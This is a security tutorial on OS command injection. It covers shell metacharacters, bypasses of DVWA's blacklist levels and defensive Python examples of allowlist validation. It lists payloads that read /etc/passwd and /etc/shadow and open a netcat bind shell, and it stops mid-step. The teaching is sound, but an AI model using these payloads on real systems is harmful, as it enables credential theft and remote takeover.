Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/
Command injection, also known as OS command injection, is an attack technique used to execute commands on a host operating system via a vulnerable web application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, and so on) to a system shell. These commands are executed with the privileges of the vulnerable application. These attacks are due to the web application not having sufficient input validation on the command being run.
To test for command injection you use metacharacters to string commands together, just as you can from the terminal or command prompt. For example, type this into a Linux terminal:

ping -c 4 127.0.0.1 && ls

Adding && between these commands runs the ls command if the preceding ping command is successful.

There are a whole bunch of other metacharacters you can use; some of the more common ones I have listed below.
Metacharacters

• ; The semicolon is the most common metacharacter used to test an injection flaw. The shell will run all the commands in sequence, separated by the semicolon.
• & Separates multiple commands on one command line. It runs the first command, then the second command.
• && Runs the command following && only if the preceding command is successful.
• | The pipe pipes the output of the first command into the second command.
• || Redirects the standard output of the first command to the standard input of the second command.
• ` The backtick is used to force the shell to interpret and run commands between backticks. Following is an example of this command: variable="OS version `uname -a`" && echo $variable
• () The brackets are used to nest commands.
• # The hash is used as a command-line comment.
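The point made in the introduction (user input reaching a system shell) and the metacharacter list above can be shown in a few lines. The following is an added example, not code from this tutorial or from DVWA. It uses Python's subprocess module with echo standing in for ping so that it runs offline; the two inputs are constructed for the example. It contrasts the vulnerable pattern (input glued into a command string that /bin/sh parses) with running the program directly with an argument list, and then runs each metacharacter from the list through /bin/sh so its effect can be seen.

```python
import subprocess

# Constructed inputs: what a normal user submits, and what an attacker submits.
NORMAL_INPUT = "127.0.0.1"
INJECTED_INPUT = "127.0.0.1 && echo INJECTED"

# 'echo' stands in for 'ping' so the example needs no network access.
COMMAND = "echo"


def run_via_shell(user_input: str) -> str:
    """The vulnerable pattern: the input is concatenated into a command string
    that a system shell (/bin/sh here) parses, so metacharacters in the input
    become shell syntax and extra commands run with the application's privileges."""
    result = subprocess.run(
        f"{COMMAND} ping {user_input}",
        shell=True, capture_output=True, text=True,
    )
    return result.stdout


def run_as_argv(user_input: str) -> str:
    """The safe pattern: no shell is involved, the program is executed directly
    and the input is passed as a single argument, so '&&' is just text."""
    result = subprocess.run(
        [COMMAND, "ping", user_input],
        capture_output=True, text=True,
    )
    return result.stdout


def shell_operator_semantics() -> dict:
    """Runs one command line per metacharacter through /bin/sh and returns
    what each printed. '&' is left out because a backgrounded command makes
    the output order nondeterministic."""
    cases = {
        ";":  "echo first ; echo second",     # both run, in sequence
        "&&": "echo first && echo second",    # second runs only if first succeeds
        "||": "false || echo second",         # second runs only if first fails
        "|":  "echo first | tr a-z A-Z",      # stdout of first becomes stdin of second
        "`":  "echo version=`echo 1.0`",      # the backticked command runs first
        "()": "(echo first; echo second)",    # grouped commands run in a subshell
        "#":  "echo first # echo second",     # everything after # is a comment
    }
    return {
        op: subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
        for op, cmd in cases.items()
    }


if __name__ == "__main__":
    print("via shell :", repr(run_via_shell(INJECTED_INPUT)))
    print("as argv   :", repr(run_as_argv(INJECTED_INPUT)))
    for op, out in shell_operator_semantics().items():
        print(f"{op:3} -> {out!r}")
```

With the injected input, run_via_shell prints "ping 127.0.0.1" followed by "INJECTED" on its own line, because the shell treated && as an operator; run_as_argv prints the whole input as one literal argument and nothing else runs. The argument-list form is the fix to reach for first; validation of the input (covered under the Impossible level below) is the second layer.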
Command Injection with DVWA

DVWA stands for Damn Vulnerable Web Application. If you don't already have DVWA installed and haven't checked out my tutorial on setting up a vulnerable web server, check that out here.

Log in to DVWA and start off by setting the DVWA Security level to Low and clicking Submit.
Now select the Command Injection button and you should be presented with a page that says 'ping a device' and gives you a box to enter an IP address. Enter any IP address and it will ping that address.

If we take a look at the source by clicking the View Source button in the bottom right-hand corner of DVWA, we can see what the application is doing in the background.
Once you have clicked View Source you will be presented with a new window displaying the PHP code above, which the DVWA team have really nicely commented for us.

Basically, the program takes our input in the form of an IP address, then determines what the backend operating system is (Windows or Linux), then runs the appropriate ping command. It then echoes the output of the command back into the web application.

As the web application interacts with the backend operating system and is not sanitizing our input, we can introduce metacharacters to string on extra commands, allowing us to break out of its intended ping command and run our own commands directly on the backend operating system.
Add the metacharacter && after your IP address. This allows you to string the second command onto the first, and it will run as long as the first command is successful. As I know the backend operating system (in this case) is Linux, I try ls -la to list the contents of the directory the web application is running in.

After running the command you can see the ping command run and then the ls command listing the contents of the directory where the web application is running.
Security Level Medium

Switch the security level up to Medium and try the command again from security level Low:

127.0.0.1&&ls -la

Notice the command runs fine with just the IP address, but as soon as you add the metacharacter (&&) and your injected command it does not output anything and reloads the page. If you take a look at the source you can see the programmer has modified his code from security level Low, adding a blacklist that blocks two metacharacters from being added to the input: && and ;.

Lucky for us there are plenty of other metacharacters to try. Changing the metacharacter to a single & (or any other that is not on the blacklist) still allows us to inject our command.
Security Level High

Now increase the security level of DVWA to High, and notice that the same command from security level Medium above no longer works.

Now let's open up the source code and take a look at what changes have been made.

It looks like the programmer has extended the list of metacharacters that are blacklisted in the web application. But all is not lost: notice the highlighted area in the blacklist above. There is an error in the syntax: the programmer has added an extra space after the | (pipe) metacharacter and after the backtick. This means we should still be able to use command injection as long as we don't put any spaces in our command and use the pipe like this.

This shows that even though the programmer has made a thorough blacklist, one little extra space still lets us inject our commands into the web application.
Security Level Impossible

On security level Impossible this is how it should be done. If we first take a look at the source we can see what changes have been made to the program.

As you can see from the commented code above, the programmer has got rid of the blacklist altogether and is now instead validating the user's input; anything other than an IP address gives the error message "You have entered an invalid IP".
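To make the difference between the Medium, High and Impossible approaches concrete, here is an added example in Python; it is not DVWA's code. It models each blacklist as "delete every listed substring from the input" (an assumption about how the filter behaves), takes the Medium entries && and ; from the text above, reconstructs the High list with the stray space after the pipe and after the backtick that the text points out (the remaining High entries are assumed for this example), and implements the Impossible level as an allowlist check that accepts only a dotted-quad IPv4 address before building an argument list for ping. The sample inputs are the ones tried in the text, constructed here.

```python
# Medium-level blacklist as named in the text above.
MEDIUM_BLACKLIST = ("&&", ";")

# High-level blacklist reconstructed from the text: a longer list, but with a
# stray space after '|' and after the backtick. Entries other than those two
# are assumed for this example, not taken from DVWA.
HIGH_BLACKLIST = ("&", ";", "| ", "-", "$", "(", ")", "` ", "||")

# Shell syntax that /bin/sh would still act on if it survives filtering.
SHELL_OPERATORS = ("&&", "||", "|", "&", ";", "`", "$(", "\n")


def strip_blacklisted(user_input: str, blacklist) -> str:
    """Blacklist filter modeled as deleting every listed substring (an
    assumption about the filter). The result is what would reach the shell."""
    for token in blacklist:
        user_input = user_input.replace(token, "")
    return user_input


def still_has_shell_syntax(text: str) -> bool:
    """True if any shell control operator survived the filter."""
    return any(op in text for op in SHELL_OPERATORS)


def is_valid_ipv4(user_input: str) -> bool:
    """Allowlist check in the spirit of the Impossible level: exactly four
    dot-separated decimal octets in the range 0-255 and nothing else."""
    parts = user_input.split(".")
    if len(parts) != 4:
        return False
    return all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def build_ping_argv(user_input: str) -> list:
    """Validates first, then builds an argument list so that no shell ever
    parses the value, even if the validation were loosened later."""
    if not is_valid_ipv4(user_input):
        raise ValueError("You have entered an invalid IP")
    return ["ping", "-c", "4", user_input]


def evaluate(level: str, user_input: str):
    """Returns (text that reaches the shell, or None if the input is rejected,
    whether that text still carries shell syntax)."""
    if level == "medium":
        filtered = strip_blacklisted(user_input, MEDIUM_BLACKLIST)
    elif level == "high":
        filtered = strip_blacklisted(user_input, HIGH_BLACKLIST)
    elif level == "impossible":
        if not is_valid_ipv4(user_input):
            return None, False
        filtered = user_input
    else:
        raise ValueError(f"unknown level {level!r}")
    return filtered, still_has_shell_syntax(filtered)


if __name__ == "__main__":
    # Constructed inputs: the ones the text tries at each level.
    for level, payload in [("medium", "127.0.0.1&&ls -la"),
                           ("medium", "127.0.0.1&ls"),
                           ("high", "127.0.0.1&ls"),
                           ("high", "127.0.0.1|ls"),
                           ("impossible", "127.0.0.1|ls"),
                           ("impossible", "127.0.0.1")]:
        print(f"{level:10} {payload!r:24} -> {evaluate(level, payload)}")
```

Running it reproduces the observations above: at Medium, stripping && turns 127.0.0.1&&ls -la into 127.0.0.1ls -la, which is why the page shows no output, while a single & passes untouched; at High the single & is gone, but 127.0.0.1|ls passes because only "| " (pipe followed by a space) is on the list; at Impossible anything that is not four decimal octets is rejected before a command is ever built. Substring blacklists are only as good as their last entry, which is the argument for the allowlist plus argument-list approach.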
Things to Try Yourself

If you have also installed Mutillidae and bWAPP from my setting up a vulnerable LAMP server tutorial, have a go at the command injection section of these.

Remember, any command you can run in the terminal you can run after a command injection; you don't have to just use ls as I have in my examples. Try some of these:

127.0.0.1|whoami shows you the user the web application is currently running as.
127.0.0.1|uname -a shows the operating system version the web server is running.
127.0.0.1&&ifconfig shows you all the network configuration information.
127.0.0.1&&php -v gives you the PHP version running on the web application's server.
127.0.0.1&&cat /etc/passwd displays all the users on the backend Linux server.
127.0.0.1&&cat /etc/shadow displays all hashed passwords, but only if you are running with root privileges.
NetCat Remote Shell

If NetCat (nc) is installed on your vulnerable web server and it has the -e option, you should be able to create a remote shell like so.

127.0.0.1&&nc -lp 31337 -e /bin/bash

Then from your PC connect to this listener by typing the following, using the web server's IP address.